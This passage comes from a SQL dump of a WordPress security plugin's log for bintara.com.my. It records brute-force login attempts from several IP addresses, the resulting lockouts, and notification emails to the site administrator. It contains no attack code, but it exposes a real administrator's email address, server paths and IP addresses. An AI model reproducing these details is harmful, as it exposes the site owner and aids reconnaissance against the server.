13:36:36','2019-09-21 13:36:35',17902896,19308088,'https://bintara.com.my/2019/wp-login.php',1,0,'103.221.221.133'),(25998,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:36:36','2019-09-21 13:36:35',18108960,19308088,'https://bintara.com.my/2019/wp-login.php',1,0,'103.221.221.133'),(25995,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:36:30','2019-09-21 13:36:29',18089440,19290200,'https://bintara.com.my/blog/wp-login.php',1,0,'68.183.130.158'),(25996,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYnY3kXpgmG5P@iB8kz4gAAAJY\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"103.221.221.133\";s:11:\"REMOTE_PORT\";s:5:\"57854\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYnY3kXpgmG5P@iB8kz4gAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072995.6222\";s:12:\"REQUEST_TIME\";s:10:\"1569072995\";}}','notice','2019-09-21 13:36:36','2019-09-21 13:36:35',17818056,19308088,'https://bintara.com.my/2019/wp-login.php',1,0,'103.221.221.133'),(25994,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:36:29\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:36:29\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:51:29\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:51:29\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:36:30','2019-09-21 13:36:29',17883768,19290200,'https://bintara.com.my/blog/wp-login.php',1,0,'68.183.130.158'),(25991,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:36:27\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:36:27\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:51:27\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:51:27\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:36:28','2019-09-21 13:36:27',17882976,19288656,'https://bintara.com.my/wp/wp-login.php',1,0,'176.9.74.214'),(25992,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:36:28','2019-09-21 13:36:27',18088600,19288656,'https://bintara.com.my/wp/wp-login.php',1,0,'176.9.74.214'),(25993,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYnXFiJ7D9Gn7wDPh8h8wAAAMw\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"68.183.130.158\";s:11:\"REMOTE_PORT\";s:5:\"54218\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYnXFiJ7D9Gn7wDPh8h8wAAAMw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072988.7314\";s:12:\"REQUEST_TIME\";s:10:\"1569072988\";}}','notice','2019-09-21 13:36:30','2019-09-21 13:36:29',17798952,19290200,'https://bintara.com.my/blog/wp-login.php',1,0,'68.183.130.158'),(25988,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:35:44\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:35:44\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:50:44\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:50:44\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:35:45','2019-09-21 13:35:44',17880416,19286800,'https://bintara.com.my/wordpress/wp-login.php',1,0,'167.114.118.135'),(25989,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:35:45','2019-09-21 13:35:44',18086016,19286800,'https://bintara.com.my/wordpress/wp-login.php',1,0,'167.114.118.135'),(25990,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYnWnkXpgmG5P@iB8kz3gAAAJU\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"176.9.74.214\";s:11:\"REMOTE_PORT\";s:5:\"41738\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYnWnkXpgmG5P@iB8kz3gAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072986.9325\";s:12:\"REQUEST_TIME\";s:10:\"1569072986\";}}','notice','2019-09-21 13:36:28','2019-09-21 13:36:27',17798240,19288656,'https://bintara.com.my/wp/wp-login.php',1,0,'176.9.74.214'),(25986,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:35:32','2019-09-21 13:35:31',18094992,19291320,'https://bintara.com.my/test/wp-login.php',1,0,'165.22.144.17'),(25987,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYnMDDrcQxTmGrCWuaSCwAAAcc\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"167.114.118.135\";s:11:\"REMOTE_PORT\";s:5:\"37069\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYnMDDrcQxTmGrCWuaSCwAAAcc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072944.2387\";s:12:\"REQUEST_TIME\";s:10:\"1569072944\";}}','notice','2019-09-21 13:35:45','2019-09-21 13:35:44',17796720,19286800,'https://bintara.com.my/wordpress/wp-login.php',1,0,'167.114.118.135'),(25985,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:35:31\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:35:31\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:50:31\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:50:31\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:35:32','2019-09-21 13:35:31',17889472,19291320,'https://bintara.com.my/test/wp-login.php',1,0,'165.22.144.17'),(25982,0,'lockout','username-lockout::admin','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:5:\"admin\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:35:14\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:35:14\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:50:14\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:50:14\";s:16:\"lockout_username\";s:5:\"admin\";}','action','2019-09-21 13:35:15','2019-09-21 13:35:14',18395568,19613176,'https://bintara.com.my/test/xmlrpc.php',1,0,'137.74.158.143'),(25983,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:35:15','2019-09-21 13:35:14',18603192,19613176,'https://bintara.com.my/test/xmlrpc.php',1,0,'137.74.158.143'),(25984,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYnI3kXpgmG5P@iB8kzvgAAAJY\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"165.22.144.17\";s:11:\"REMOTE_PORT\";s:5:\"57250\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYnI3kXpgmG5P@iB8kzvgAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072931.4402\";s:12:\"REQUEST_TIME\";s:10:\"1569072931\";}}','notice','2019-09-21 13:35:32','2019-09-21 13:35:31',17805072,19291320,'https://bintara.com.my/test/wp-login.php',1,0,'165.22.144.17'),(25980,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:35:12','2019-09-21 13:35:12',18088336,19289944,'https://bintara.com.my/test/wp-login.php',1,0,'137.74.158.143'),(25981,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYnEnkXpgmG5P@iB8kzuQAAAJM\";s:12:\"REDIRECT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"137.74.158.143\";s:11:\"REMOTE_PORT\";s:5:\"35456\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:1